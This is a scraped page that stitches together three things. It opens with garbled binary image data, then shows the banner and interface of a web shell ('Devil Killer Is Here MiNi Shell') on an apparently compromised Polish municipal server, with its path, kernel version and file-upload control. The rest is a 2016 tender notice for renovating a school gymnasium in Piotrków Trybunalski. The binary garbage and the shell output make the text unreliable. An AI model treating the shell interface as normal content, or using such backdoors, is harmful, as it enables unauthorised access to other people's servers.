JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160204/24422-N-2016.html

<p class="kh_header"><b>Piotrków Trybunalski: Modernizacja budynku sali gimnastycznej w SP nr  8 w Piotrkowie Trybunalskim</b><br>
<b>Numer ogłoszenia: 24422 - 2016; data zamieszczenia: 04.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Piotrków Trybunalski , ul. Pasaż Rudowskiego 10, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7327796, faks 044 7327798.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja budynku sali gimnastycznej w SP nr  8 w Piotrkowie Trybunalskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane związane z realizacją zadania inwestycyjnego o nr RIM-21 G i pn. Modernizacja budynku sali gimnastycznej w SP nr 8 w ramach którego wykonane zostaną izolacje pionowe i poziome ścian fundamentowych oraz roboty naprawcze w budynku Sali gimnastycznej Szkoły Podstawowej nr 8 w Piotrkowie Trybunalskim. 

w skład którego wchodzą następujące elementy:

Branża ogólnobudowlana:

1. Roboty przygotowawcze i towarzyszące: 
1.1. Rozbiórka rynien, rur spustowych i obróbek blacharskich
1.2. Wykucie z muru ościeżnic stalowych i drewnianych
1.3. Rozbiórka pokryć dachu z papy i dachówki bitumicznej
1.4. Uzupełninia pokryć dachów papą asfaltową
1.5. Demontaż podsufitki z płyt pilśniowych twardych
1.6. Wymiana podsufitki z desek profilowanych
1.7. Wymiana elementów konstrukcyjnych dachu krokwie i kleszcze
1.8. Demontaż zadaszeń nad wejściem do budynku Sali gimnastycznej
1.9. Skuwanie tynków wewnętrznych
1.10. Montaż i demontaż ogrodzeń tymczasowych
1.11. Rozbiórka nawierzchni z kostki betonowej
1.12. Rozbiórka okładzin ściennych, posadzek z płytek i z tworzyw sztucznych
1.13. Wywóz złomu i gruzu  wraz z opłatą za wysypisko
1.14.Demontaż i ponowny montaż zestawu pisuarowego i umywalki fajansowej

2. Roboty izolacyjne:
2.1. Wykopy wąskoprzestrzenne nieumocnione o szer. dna do 1,5 m
2.2. Iniekcja grawitacyjna jednorzędowa jednostronna w ścianach z cegły
2.3. Iniekcja bezciśnieniowa jednorzędowa jednostronna w ścianach z cegły
2.4.Gruntowanie ręczne powierzchni pionowych nieotynkowanych
2.5. Uszczelnienie przejść rurowych masą bitumiczną KMB
2.6. Wysokoelestyczna izolacja - wykonanie wyobleń na styku ścian i ław fundamentowych
2.7. Izolacja pionowa z mas KMB przygotowanie podłoża + nakładanie ręczne masy izolacji
2.8. Ochrona izolacji ścian piwnic płytami polistyrenowymi
2.9. Poszerzanie pęknięć w ścianach oraz wycięcie bruzd w spoinach 
2.10. Montaż prętów  O6 w wykutych bruzdach
2.11. Zaprawianie bruzd zaprawą cementową
2.12. Naprawa uszkodzonych powierzchni ścian

3.Tynki renowacyjne na zewnątrz budynku:
3.1. Tynki renowacyjne na ścianach nakładane ręcznie - obrzutka półkryjąca pod tynk
3.2. Tynki renowacyjne WTA gr. 2,5 cm
3.3. Tynki mineralne na ścianach zewnętrznych

4. Roboty wewnątrz budynku:
4.1. Zerwanie posadzek cementowych i posadzek lub okładzin z masy lastrykowej 
4.2. Uzupełnienie posadzek  lastrykowych wraz z cokolikiem 
4.3. Wykonanie fasety ze szpachlówki z masy uszczelniającej

5. Tynki renowacyjne wewnątrz budynku:
5.1. Tynki renowacyjne na ścianach nakładane ręcznie - obrzutka półkryjąca pod tynk
5.2. Tynki renowacyjne WTA gr. 2,5 cm
5.3. Tynki mineralne na ścianach wewnętrznych

6. Kładzenie glazury:
6.1.Okładziny ścienne z płytek ceramicznych
6.2. Wiercenie i wycinanie otworów w okładzinach ceramicznych

7. Roboty malarskie:
7.1. Zeskrobania i zmycie starej farby
7.2. Malowanie ścian i sufitów farbą silikatową
7.3. Ługowanie farby olejnej z tynków ścian
7.4. Malowanie olejne starych tynków wewnętrznych ścian z jednokrotnym szpachlowaniem

8. Roboty zewnętrzne na elewacji:
8.1. Ocieplenie ścian budynków metodą lekką mokrą
8.2. Uzupełnienie gzymsów z cegieł
8.3. Obsadzenie kratek wentylacyjnych w ścianach z cegieł
8.4. Wykonanie profili ciągnionych zwykłych o szer. w rozwinięciu do 40 cm
8.5. Szpachlowanie tynków zewnętrznych szpachlówką zbrojoną włóknami
8.6. Uzupełnienie tynków zwykłych kat. III na kominach i ścianach
8.7. Izolacja pozioma i pionowa przeciwwilgociowa z elastycznych szlamów uszczelniających
8.8. Okładziny schodów z płytek kamionkowych z cokolikiem
8.9. Poszerzanie pęknięć w ścianach oraz wycięcie bruzd w spoinach 
8.10. Przygotowanie i montaż prętów  O6 w wykutych bruzdach
8.11. Zaprawianie bruzd o szer. Do 25 mm zaprawą cementową

9. Malowanie elewacji:
9.1. Malowanie tynków zewnętrznych i cokołów  farbą krzemoorganiczną
9.2. Dwukrotne malowanie farbą olejna krat i balustrad z prętów ozdobnych oraz powierzchni metalowych pełnych

10. Odtworzenie chodnika przed budynkiem:
10.1. Mechaniczne wykonanie koryta w gruncie kat. I-IV  na szerokości jezdni i chodnika
10.2. Podbudowa z kruszywa łamanego- warstwa o grubości po zagęszczeniu - 15 cm
10.3. Obrzeża betonowe na ławie zwykłej z betonu B15
10.4. Chodniki z kostki betonowej grub. 6 cm na podsypce cement.- wapiennej- materiał z odzysku
10.5. Ścieki z prefabrykatów betonowych na podsypce piaskowej

11. Wymiana posadzki z parkietu w Sali gimnastycznej:
11.1. Rozebranie posadzek z deszczułek z oderwaniem listew
11.2. Rozbiórka izolacji z papy ułożonej luzem na ślepej podłodze
11.3. Rozebranie podłóg ślepych i legarów
11.4. Wykonanie izolacji przeciwwilgociowych i przeciwwodnych z folii PE
11.5. Wykonanie ślepej podłogi z desek o grub. 32 mm na legarach ułożonych krzyżowo
11.6. Wykonanie posadzki z deszczółek mocowanych na gwoździe z doszczelnieniem parkietu
11.7. Gruntowanie parkietu lakierem podkładowym
11.8. Demontaż i ponowny montaż drabinek gimnastycznych

12. Roboty posadzkarskie w pozostałych pomieszczeniach:
12.1. Gruntowanie podłoży  pow. poziome
12.2. Wykonanie posadzek samopoziomujących o gr. 5-10 mm
12.3. Pozioma izolacja podpłytkowa przeciwwilgociowa z folii w płynie
12.4. Wklejanie w powłokę wodochronną taśmy uszczelniającej
12.5. Okładziny podłogowe wraz z cokolikiem z płytek z kamieni sztucznych na zaprawie klejowej cienkowarstwowej

13. Wykonanie pokryć i konstrukcji dachowych oraz podobne roboty:
13.1. Wykonanie i montaż obróbek blacharskich z blachy powlekanej
13.2. Montaż rynien i rur spustowych z PCV
13.3. Jednowarstwowe pokrycie dachu papą termozgrzewalną
13.4. Pokrycie dachu dachówką bitumiczną zgrzewalną
13.5. Elewacja z paneli typu siding układanych poziomo naruszcie drewnianym bez docieplenia 

14. Stolarka drzwiowa i daszek nad wejściem;
14.1. Drzwi stalowe pełne ocieplone o pow. ponad 2 m2
14.2. Drzwi stalowe pełne nieocieplone o pow. ponad 2 m2
14.3. Daszek nad wejściem do pomieszczenia konserwatorów

15. Piłkochwyt:
15.1. Ręczne wykopy jamiste o głębokości do 1,5 m
15.2. Stopy fundamentowe betonowe
15.3. Piłkochwyty z siatki PP na słupkach z profili stalowych o wysokości 5 mb.
15.4. Ręczne rozplantowanie ziemi wydobytej z wykopu.
 
Branża instalacyjno-inżynieryjna:

1. Drenaż:
1.1. Rozebranie nawierzchni z kostki betonowej,
1.2. Wykopy pod kanały pełne, perforowane oraz studnie,
1.3. Podłoża i obsypka piaskowa kanałów pełnych oraz studni,
1.4. Podłoża i obsypka żwirowa kanałów perforowanych,
1.5. Ułożenie rur pełnych, perforowanych, studni,
1.6. Ułożenie geowłókniny,
1.7. Zasypanie wykopów, zagęszczenie,
1.8. Włączenie do istniejącej studni,
1.9.Odtworzenie nawierzchni z kostki

Branża elektryczna:

1.1. Zakres robót:
Tematem opracowania jest dokumentacja budowlana instalacji elektrycznej w pomieszczeniach na parterze szkoły podstawowej nr 8 przy ul. Sienkiewicza w Piotrkowie Tryb.
Zakres robót obejmuje wykonanie następujących instalacji:
- przebudowę tablicy rozdzielczej T1 na parterze w szkole
- instalacja oświetleniowa,
- instalacja gniazd wtykowych,
- instalacji zasilającej urządzeń wentylacyjnych,
- instalacji połączeń ekwipotencjalnych.
Zasilanie instalacji elektrycznej z rozdzielnicy głównej budynku szkoły.

1.2. Ochrona od porażeń prądem elektrycznym
Zgodnie z obowiązującą normą PN-IEC 60364 zastosowano układ TN-S. Jako ochronę dodatkową przed porażeniem zastosowano szybkie wyłączenie z zastosowaniem wyłączników nadprądowych i różnicowoprądowych. W obwodach głównych zainstalowane będą wyłączniki przeciwporażeniowe różnicowoprądowe, 4-biegunowe i dwubiegunowe, bezpośrednie o prądzie różnicowym 30mA.
Ochronie podlegają:
- oprawy oświetleniowe (za wyjątkiem opraw o II klasie ochronności),
- bolce ochronne gniazd wtyczkowych,
- metalowe obudowy tablic rozdzielczych,
- elementy konstrukcji metalowych.
Ochronę zrealizować zgodnie z PN-IEC 60364
W przewodzie neutralnym N nie wolno instalować bezpieczników i łączników. Styki ochronne gniazd wtyczkowych połączyć z przewodem ochronnym PE. Po wykonaniu instalacji dokonać pomiarów skuteczności ochrony od porażeń prądem elektrycznym.

1.3. Ochrona przeciwprzepięciowa
Projektuje się ochronę przepięciową instalacji elektrycznej poprzez montaż ochronnika przeciwprzepięciowego typu B+C w tablicy rozdzielczej T1.

1.4. Uwagi końcowe
Całość instalacji elektrycznych, niezależnie od uwag zawartych w niniejszym opracowaniu, należy wykonać zgodnie z obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej. Wszelkie prace objęte niniejszym opracowaniem winny być wykonywane przez osoby posiadające odpowiednie uprawnienia wykonawcze bądź pod ich nadzorem. Po wykonaniu prac wykonać pomiary rezystancji izolacji, ochrony przeciwporażeniowej, rezystancji uziemienia. Wyniki pomiarów potwierdzić odpowiednimi protokołami. W procesie realizacji możliwe jest zastosowanie urządzeń i aparatury innych firm, niż wskazane w opracowaniu lecz równorzędnych technicznie, o takich samych parametrach, pod warunkiem zachowania standardu jakościowego nie gorszego niż przywołany w dokumentacji.
UWAGA! SYSTEM ZASILANIA ZAWIERA OGRANICZNIKI PRZEPIĘĆ. NALEŻY JE ODŁĄCZYĆ PRZED POMIAREM REZYSTANCJI IZOLACJI.


Klasyfikacja wykonywanych robót:
CPV:
45100000-8 Przygotowanie terenu pod budowę
45410000-4 Tynkowanie
45453100-8 Roboty renowacyjne
45431200-9 Kładzenie glazury
45442180-2 Powtórne malowanie
45443000-4 Roboty elewacyjne
45442110-1 Malowanie budynków
45233260-9 Roboty budowlane  w zakresie dróg pieszych
45432113-9 Kładzenie parkietu
45432100-5 Kładzenie i wykładanie podłóg
45261000-4 Wykonywanie pokryć i konstrukcji dachowych i inne podobne roboty specjalistyczne
45421100-5 Instalowanie drzwi i okien i podobnych elementów
45112500-0 Usuwanie gleby
45214220-8  Roboty budowlane w zakresie szkół średnich
45232440-8  Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków
45311000-0 Roboty w zakresie okablowania oraz instalacji elektrycznych
45231400-9 Roboty budowlane w zakresie budowy linii energetycznych

Ogólne warunki wykonania robót:

Zamówienie  należy  wykonać  ściśle  wg  Projektu budowlano-wykonawczego opracowanego przez firmę  projEKtANt arch.arch.  Ewa Katarasińska, Anna Nowak w IV kwartale 2015 r., oraz zgodnie ze Szczegółowymi Specyfikacjami  Technicznymi wykonania i odbioru robót.
UWAGA!  Z uwagi na ryczałtowe rozliczenie za wykonanie  ww. zadania inwestycyjnego załączone w materiałach do przetargu przedmiary dla poszczególnych elementów kompleksu zamieszczono w celu INFORMACYJNYM . Ewentualne pominięcie jakiegokolwiek elementu w załączonych przedmiarach a opisane w opisie technicznym nie zwalnia Wykonawcy z jego wykonania bez prawa ubiegania się o dodatkowe wynagrodzenie.
Przed przystąpieniem do przetargu należy dokonać wizji lokalnej obiektu w miejscu realizacji zamówienia
Wszystkie roboty winny być prowadzone zgodnie z Prawem Budowlanym i pod kierownictwem osoby  posiadającej uprawnienia do pełnienia samodzielnej funkcji technicznej  w budownictwie o specjalności konstrukcyjno - budowlanej  
Warunkiem ubiegania się o zamówienie jest konieczność przedstawienia wykazu wykonanych w ciągu pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia,  a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej trzech zamówień odpowiadających zakresowi i złożoności z przedmiotem niniejszego  zamówienia wraz  z poświadczeniami ( dawniej referencjami ) o wartości całkowitej co najmniej 200 000,00 zł brutto każda, polegających na wykonaniu robót remontowych budynków użyteczności publicznej w tym przynajmniej dwóch dotyczących robót termomodernizacyjnych. 
Przed podpisaniem umowy Wykonawca przedstawi Inwestorowi polisę ubezpieczenia OC, obejmującą osoby trzecie, na cały okres realizacji zadania.
               
Wszystkie materiały użyte do budowy muszą posiadać: 
Certyfikat na znak bezpieczeństwa wykazując, że zapewniono zgodność z kryteriami właściwych przepisów i dokumentów technicznych.
Deklarację zgodności lub certyfikat zgodności z: Polską Normą, Normą Europejską lub Aprobatą Techniczną w przypadku wyrobów, dla których nie ustanowiono normy, jeżeli nie są objęte certyfikacją. 
Oświadczenia kierownika budowy i kierowników robót, że wyroby budowlane zostały dopuszczone do stosowania w budownictwie i posiadały odpowiednie oznakowania B lub CE oraz załączoną informację o wyrobie.
 Podczas realizacji robót Wykonawca będzie przestrzegać przepisów dotyczących bezpieczeństwa i higieny pracy zgodnie z rozporządzeniem Ministra Infrastruktury z dn. 6 lutego 2003 r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz. U. z 2003 r. Nr 47, poz. poz.401)
Warunkiem koniecznym dla prawidłowego przygotowania oferty przetargowej jest zapoznanie się z projektem budowlano-wykonawczym oraz Specyfikacjami Technicznymi Wykonania i Odbioru Robót dotyczącym przedmiotowego zamówienia. 
Firma - przedsiębiorstwo, z którym zostanie podpisana umowa o roboty budowlane dostarczy do  dnia podpisania umowy kosztorys ofertowy zgodny z ofertą przedstawioną do przetargu. Wymaganą metodą kalkulacji ceny za roboty budowlane jest metoda uproszczona. Na końcu kosztorysu ofertowego należy doliczyć podatek od towarów i usług VAT. Kosztorys ten stanowi integralną część umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.41.00.00-4, 45.45.31.00-8, 45.43.12.00-9, 45.44.21.80-2, 45.44.30.00-4, 45.44.21.10-1, 45.23.32.60-9, 45.43.21.13-9, 45.43.21.00-5, 45.26.10.00-4, 45.42.11.00-5, 45.11.25.00-0, 45.21.42.20-8, 45.23.24.40-8, 45.31.10.00-0, 45.23.14.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonania oceny spełnienia wymaganych warunków:
przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy  z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaże co najmniej trzy zamówienia o wartości całkowitej co najmniej 200 000,00 zł brutto każda  (wykonane w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) odpowiadające rodzajem przedmiotowi niniejszego zamówienia, tj. polegające na wykonaniu robót remontowych budynków, w tym przynajmniej dwóch dotyczących robót termomodernizacyjnych  - wg załącznika nr  4;
Załączy dokumenty potwierdzające, że roboty wyszczególnione w załączniku nr 4 zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone
Sposób dokonania oceny spełnienia wymaganych warunków:
przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy  z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonania oceny spełnienia wymaganych warunków:
przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy  z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedłoży wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami- wg załącznika nr 3. Osoby te muszą posiadać uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie o specjalności konstrukcyjno - budowlanej.
Sposób dokonania oceny spełnienia wymaganych warunków:
przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy  z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonania oceny spełnienia wymaganych warunków:
przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy  z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania powyższych warunków nastąpi na podstawie oświadczeń lub dokumentów zawartych w ofercie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

